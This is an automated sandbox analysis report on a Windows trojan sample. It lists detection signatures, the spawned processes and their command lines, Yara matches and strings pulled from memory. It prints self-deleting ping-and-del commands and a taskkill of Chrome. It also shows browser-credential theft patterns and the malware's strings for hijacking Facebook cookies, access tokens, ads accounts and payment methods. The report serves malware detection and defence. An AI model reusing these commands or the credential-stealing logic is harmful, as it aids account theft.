Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368 (renamed file extension from 25368 to exe)
Analysis ID:	385405
MD5:	29389832e538957dc769cf709f80144a
SHA1:	72f5ca06d840acbc9b49e4096e341c0dbaac891e
SHA256:	d6d2e00343a3cad48cc2f4799ce87d27acc3ce154aed286c07f226de2e9c4035
Infos:
Most interesting Screenshot:

Detection

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to harvest and steal browser information (history, passwords, etc)

Tries to resolve many domain names, but no domain seems valid

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Installs a Chrome extension

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe' MD5: 29389832E538957DC769CF709F80144A)

msiexec.exe (PID: 6488 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

26FF190E7AE0F7C7.exe (PID: 6676 cmdline: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3 MD5: 29389832E538957DC769CF709F80144A)

1618257864703.exe (PID: 6876 cmdline: 'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 6752 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5880 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

26FF190E7AE0F7C7.exe (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3 MD5: 29389832E538957DC769CF709F80144A)

cmd.exe (PID: 6932 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6984 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cmd.exe (PID: 7040 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 7084 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 6736 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6832 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

msiexec.exe (PID: 6572 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CF809D2679ADCE8E1511069275F0596C C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.368875483.0000000002690000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000007.00000002.384812793.00000000025A0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000006.00000002.425171659.00000000026C0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.10000000.11.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.25a0000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.10000000.11.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.26c0000.2.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.25a0000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.26c0000.2.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.30f0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fece4:$s2: \nss3.dll 0x247d58:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fed58:$s6: %s\Mozilla\Firefox\profiles.ini 0x247dd8:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
6.2.26FF190E7AE0F7C7.exe.32b0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fece4:$s2: \nss3.dll 0x247d58:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fed58:$s6: %s\Mozilla\Firefox\profiles.ini 0x247dd8:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Metadefender: Detection: 25%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Virustotal: Detection: 75%	Perma Link
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Metadefender: Detection: 25%	Perma Link
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1618257864703.exe, 0000000B.00000000.375331219.000000000040F000.00000002.00020000.sdmp, 1618257864703.exe.6.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.6.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.6.dr
Source:	Binary string: atl71.pdb source: atl71.dll.6.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.6.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.6.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.6.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000015.00000000.408882795.000000000001C000.00000002.00020000.sdmp, ThunderFW.exe.6.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.6.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.6.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI429C.tmp.3.dr

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001A1D0 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Networking:

Tries to resolve many domain names, but no domain seems valid

Show sources

Source: unknown	DNS traffic detected: query: c431a802ff4a46b5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55BE681FC6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61d53b5a4bc1ab86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ed2feea30c3cc5d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: BDC347C728B2D94D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55be681fc6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bdc347c728b2d94d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: C431A802FF4A46B5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ED2FEEA30C3CC5D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: back19e64ea00d6ecfe1.io replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84B5A35D6E5335EF.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61D53B5A4BC1AB86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84b5a35d6e5335ef.com replaycode: Name error (3)

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: unknown	DNS traffic detected: query: c431a802ff4a46b5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55BE681FC6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61d53b5a4bc1ab86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ed2feea30c3cc5d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: BDC347C728B2D94D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55be681fc6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bdc347c728b2d94d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: C431A802FF4A46B5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ED2FEEA30C3CC5D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: back19e64ea00d6ecfe1.io replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84B5A35D6E5335EF.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61D53B5A4BC1AB86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84b5a35d6e5335ef.com replaycode: Name error (3)

Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
